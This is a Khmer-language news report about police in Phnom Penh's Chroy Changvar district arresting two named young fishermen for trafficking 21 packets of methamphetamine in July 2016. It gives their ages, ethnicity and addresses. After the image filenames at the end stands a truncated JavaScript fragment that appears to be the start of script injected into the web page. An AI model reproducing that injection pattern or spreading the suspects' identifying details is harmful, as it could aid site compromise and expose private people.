សមត្ថកិច្ចខណ្ឌជ្រោយចង្វារឃាត់ខ្លួនជនសង្ស័យ​២នាក់​ពីបទ​ជួញដូរគ្រឿងញៀន

 

ភ្នំពេញ ៖ ជនសង្ស័យ ២នាក់ ត្រូវបានសមត្ថកិច្ចខណ្ឌធ្វើការឃាត់ខ្លួន ក្នុងករណីជួញដូរគ្រឿងញៀនដោយខុសច្បាប់ កាលពីវេលាម៉ោង ៧និង០០នាទីយប់ ថ្ងៃទី០៨ ខែកក្កដា ឆ្នាំ២០១៦ នៅតាមបណ្តោយផ្លូវជាតិលេខ៦ ភូមិព្រែកលៀប សង្កាត់ព្រែកលៀប ខណ្ឌជ្រោយចង្វារ រាជធានីភ្នំពេញ ។

 

ជនសង្ស័យទាំង ២នាក់ មានឈ្មោះ សាឡេះ ម៉ាត់សេត ភេទប្រុស អាយុ ២២ឆ្នាំ ជនជាតិ ឥស្លាម មុខរបរ អ្នកនេសាទ និងម្នាក់ទៀតមានឈ្មោះ អីុ អាហ្សីសា ភេទប្រុស អាយុ ២០ឆ្នាំ ជនជាតិ ឥស្លាម មុខរបរ អ្នកនេសាទ បច្ចុប្បន្នអ្នកទាំង ២នាក់ មានទីលំនៅភូមិឫស្សីកែវជ្រោយ ឃុំជ្រោយមេត្រីលើ ស្រុកមុខកំពូល ខេត្តកណ្តាល ជាមួយគ្នា ។

 

សមត្ថកិច្ចបានឲ្យដឹងថា នៅថ្ងៃទី០៨ ខែកក្កដា ឆ្នាំ២០១៦ កម្លាំងសមត្ថកិច្ចអន្តរាគមន៍ខណ្ឌជ្រោយចង្វារ បានធ្វើការល្បាតក្នុងមូលដ្ឋានស្ថិតនៅតាមបណ្តោយផ្លូវជាតិលេខ៦ ភូមិព្រែកលៀប សង្កាត់ព្រែកលៀប ពេលនោះ ស្រាប់តែបានប្រទះឃើញជនសង្ស័យ ២នាក់ ដែលកំពុងធ្វើដំណើរតាមផ្លូវ ហើយបានជិះម៉ូតូយ៉ាងលឿនគេចពីគោលរបស់សមត្ថកិច្ចនៅម្តុំគល់ស្ពានជ្រោយចង្វារត្រើយខាងកើត ដោយមានការសង្ស័យ ទើបកម្លាំងសមត្ថកិច្ចយើងបានធ្វើការដេញតាម រហូតមកដល់ចំណុចមុខផ្សារព្រែកលាប ភូមិព្រែកលៀប សង្កាត់ព្រែកលៀប ហើយកម្លាំងសមត្ថកិច្ចយើងក៏បានធ្វើការសាកសួរ និងបានឆែកឆេររកឃើញនៅម្សៅក្រាមពណ៌(ស)ថ្លា ២១កញ្ចប់ ជាប្រភេទ ម៉ាកទឹកកក រួចនិងម៉ូតូ មួយគ្រឿង ម៉ាក ហុងដាឌ្រីម សេ១២៥ សេរី២០១៣ ពណ៌ខ្មៅ ពាក់ស្លាកលេខ កណ្តាល 1Q-3347 ក្រោយមកសមត្ថកិច្ចយើងចាប់បញ្ជូនខ្លួនមកកាន់អធិការដ្ឋាននគរបាលខណ្ឌ ដើម្បីសាកសួរ ។

បើតាមការឆ្លើយសារភាពពីជនសង្ស័យទាំង ២នាក់ បាននិយាយប្រាប់ថា មានគេផ្ញើរអោយយកទៅលក់នៅឯស្រុកឫស្សីជ្រោយ ខេត្តកណ្តាល ដោយរូបគេទាំង ២នាក់ បានទៅយកថ្នាំនោះ នៅម្តុំផ្លូវរថភ្លើង ក្បែររោងចក្រឆ្នាំង ស្ថិតនៅក្នុងសង្កាត់បឹងកក់១ ខណ្ឌទួលគោក ដោយទិញអស់ទឹកប្រាក់ចំនួន ៦០មឺុនរៀល បន្ទាប់ពីទទួលបានថ្នាំរួចហើយ ពួកគេទាំង ២នាក់ ក៏បាននាំគ្នាជិះម៉ូតូត្រឡប់ទៅស្រុកវិញ ក៏បានជួបនិងសមត្ថកិច្ចតែម្តង ។

បច្ចុប្បន្នជនសង្ស័យទាំង ២នាក់ខាងលើ ត្រូវបានកម្លាំងសមត្ថកិច្ចឃុំខ្លួនជាបណ្តោះអាសន្ននៅអធិការដ្ឋាននគរបាលខណ្ឌជ្រោយចង្វារ ដើម្បីកសាងសំណុំរឿង បញ្ជូនទៅកាន់តុលាការចាត់ការបន្តតាមនិតីវិធីច្បាប់ ៕ ដោយ៖ ស៊ុនតិចIMG-20160709-WA0042 IMG-20160709-WA0041 IMG-20160709-WA0040 IMG-20160709-WA0039 IMG-20160709-WA0038 IMG-20160709-WA0037var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More